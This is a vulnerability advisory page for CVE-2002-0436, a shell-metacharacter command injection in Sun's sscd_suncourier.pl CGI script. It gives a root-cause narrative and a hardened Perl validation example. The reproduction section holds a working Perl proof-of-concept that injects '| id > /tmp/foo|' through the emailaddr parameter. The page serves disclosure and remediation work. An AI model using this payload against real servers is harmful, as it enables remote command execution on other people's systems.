CVE-2002-0436
Description
sscd_suncourier.pl CGI script in the Sun Sunsolve CD pack allows remote attackers to execute arbitrary commands via shell metacharacters in the email address parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- cpe:2.3:o:sun:solaris:7.0:*:x86:*:*:*:*:*
- cpe:2.3:o:sun:solaris:8.0:*:x86:*:*:*:*:*
- cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*
- cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*
Patches
Vulnerability mechanics
Root cause
"The sscd_suncourier.pl CGI script does not sanitize shell metacharacters in the email address parameter, allowing arbitrary command execution."
Attack vector
A remote attacker can send a crafted POST request to the `sscd_suncourier.pl` CGI script. By including shell metacharacters, such as the pipe symbol (|), within the `emailaddr` parameter, the attacker can inject and execute arbitrary commands on the server with the privileges of the script. The provided exploit demonstrates using `| id > /tmp/foo|` to execute the `id` command [ref_id=1].
Affected code
The vulnerability exists within the `sscd_suncourier.pl` CGI script, which is part of the Sun Sunsolve CD pack. The script fails to properly sanitize input provided in the `emailaddr` parameter, allowing for the injection of shell metacharacters [ref_id=1].
What the fix does
The patch is not available in the provided bundle. The advisory indicates that the CGI script does not adequately sanitize input, specifically mentioning the failure to remove special characters like the pipe (|) character [ref_id=1]. Remediation would involve properly sanitizing or escaping shell metacharacters in the `emailaddr` parameter before it is processed by the script.
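One way to implement the remediation described above, as an added Perl example that is not the Sun script or its patch: it validates `emailaddr` against an allowlist and hands it to the mailer without involving a shell. The mailer path `/usr/lib/sendmail` and the helper names `valid_email` and `send_notice` are assumptions, since the script's own mail-handling code is not shown on this page.

```perl
#!/usr/bin/perl
# Added example: hardened handling of an emailaddr form field in a Perl CGI.
use strict;
use warnings;

# Assumed mailer location; the original script's mail command is not on the page.
my $MAILER = '/usr/lib/sendmail';

# Allowlist validation: accept only a conservative address shape and reject
# everything else, instead of trying to strip individual "bad" characters.
sub valid_email {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return 0 if $addr =~ /[^\x21-\x7e]/;   # no whitespace, control or non-ASCII bytes
    # The local part must start with an alphanumeric, so the value can never be
    # read as a command-line option; \z (not $) refuses a trailing newline.
    return $addr =~ /\A[A-Za-z0-9][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/
        ? 1 : 0;
}

# Hypothetical send routine: list-form pipe open passes each argument straight
# to exec(), so no shell ever parses the address.
sub send_notice {
    my ($addr, $body) = @_;
    die "rejected emailaddr\n" unless valid_email($addr);
    open(my $fh, '|-', $MAILER, '-oi', '--', $addr)
        or die "cannot run mailer: $!\n";
    print {$fh} $body;
    close($fh) or die "mailer failed: $?\n";
}

# Constructed sample inputs; the second is the emailaddr value from the
# request shown on this page. Only validation runs here, no mail is sent.
for my $in ('foo@bar.com', 'foo@bar.com| id > /tmp/foo|',
            '-oQ/tmp@x.com', "a\@b.com\nx") {
    (my $shown = $in) =~ s/\n/\\n/g;
    printf "%-30s %s\n", $shown, valid_email($in) ? 'accept' : 'reject';
}
```

Validation and shell-free invocation are independent layers: either one alone stops the pipe-character input, and keeping both means a future loosening of the pattern does not reopen command execution.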
Preconditions
- network: The target system must be running the Sun Sunsolve CD pack with the `sscd_suncourier.pl` script accessible.
- input: The attacker must be able to send a POST request to the `sscd_suncourier.pl` script.
Reproduction
```perl
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common qw(POST);

$ua = new LWP::UserAgent;
$ua->agent("Scrapers");
# POST to the CGI with shell metacharacters in the emailaddr field
my $req = POST 'http://sunsolveCD.box.com:8383/cd-cgi/sscd_suncourier.pl',
    [ step => "submit", emailaddr => "foo\@bar.com| id > /tmp/foo|" ];
$res = $ua->request($req);
print $res->as_string;
print "code", $res->code, "\n";
```
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- www.iss.net/security_center/static/8435.php (nvd, Vendor Advisory)
- www.securityfocus.com/archive/1/261544 (nvd, Vendor Advisory)
- www.securityfocus.com/bid/4269 (nvd, Vendor Advisory)